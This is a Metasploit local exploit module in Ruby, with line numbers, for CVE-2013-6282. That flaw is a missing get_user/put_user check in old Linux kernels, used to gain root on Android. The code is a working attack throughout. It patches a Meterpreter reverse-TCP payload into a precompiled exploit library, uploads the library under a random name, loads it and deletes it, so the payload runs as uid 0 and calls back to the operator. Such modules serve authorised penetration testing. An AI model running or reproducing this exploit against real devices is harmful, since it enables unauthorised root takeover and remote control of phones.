1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Common
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Android get_user/put_user Exploit',
17
        'Description' => %q{
18
          This module exploits a missing check in the get_user and put_user API functions
19
          in the linux kernel before 3.5.5. The missing checks on these functions
20
          allow an unprivileged user to read and write kernel memory.
21
          This exploit first reads the kernel memory to identify the commit_creds and
22
          ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
23
          The exploit was first discovered in the wild in the vroot rooting application.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [
27
          'fi01', # libget_user_exploit / libput_user_exploit
28
          'cubeundcube', # kallsyms_in_memory
29
          'timwr',       # Metasploit module
30
        ],
31
        'References' => [
32
          [ 'CVE', '2013-6282' ],
33
          [ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
34
          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
35
          [ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
36
        ],
37
        'DisclosureDate' => '2013-09-06',
38
        'SessionTypes' => [ 'meterpreter' ],
39
        'Platform' => [ 'android', 'linux' ],
40
        'Targets' => [[ 'Automatic', {}]],
41
        'Payload' => { 'Space' => 2048 },
42
        'DefaultOptions' => {
43
          'WfsDelay' => 120,
44
          'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
45
        },
46
        'DefaultTarget' => 0,
47
        'Compat' => {
48
          'Meterpreter' => {
49
            'Commands' => %w[
50
              core_loadlib
51
              stdapi_fs_delete_file
52
              stdapi_fs_getwd
53
            ]
54
          }
55
        },
56
        'Notes' => {
57
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
58
          'Reliability' => [ UNRELIABLE_SESSION ],
59
          'Stability' => [ CRASH_SAFE ]
60
        }
61
      )
62
    )
63
  end
64

65
  def exploit
66
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-6282.so')
67
    exploit_data = File.read(local_file, mode: 'rb')
68

69
    space = payload_space
70
    payload_encoded = payload.encoded
71

72
    # Substitute the exploit shellcode with our own
73
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
74

75
    workingdir = session.fs.dir.getwd
76
    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
77
    write_file(remote_file, exploit_data)
78

79
    print_status("Loading exploit library #{remote_file}")
80
    session.core.load_library(
81
      'LibraryFilePath' => local_file,
82
      'TargetFilePath' => remote_file,
83
      'UploadLibrary' => false,
84
      'Extension' => false,
85
      'SaveToDisk' => false
86
    )
87
    print_status("Loaded library #{remote_file}, deleting")
88
    session.fs.file.rm(remote_file)
89
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
90
  end
91
end
92

93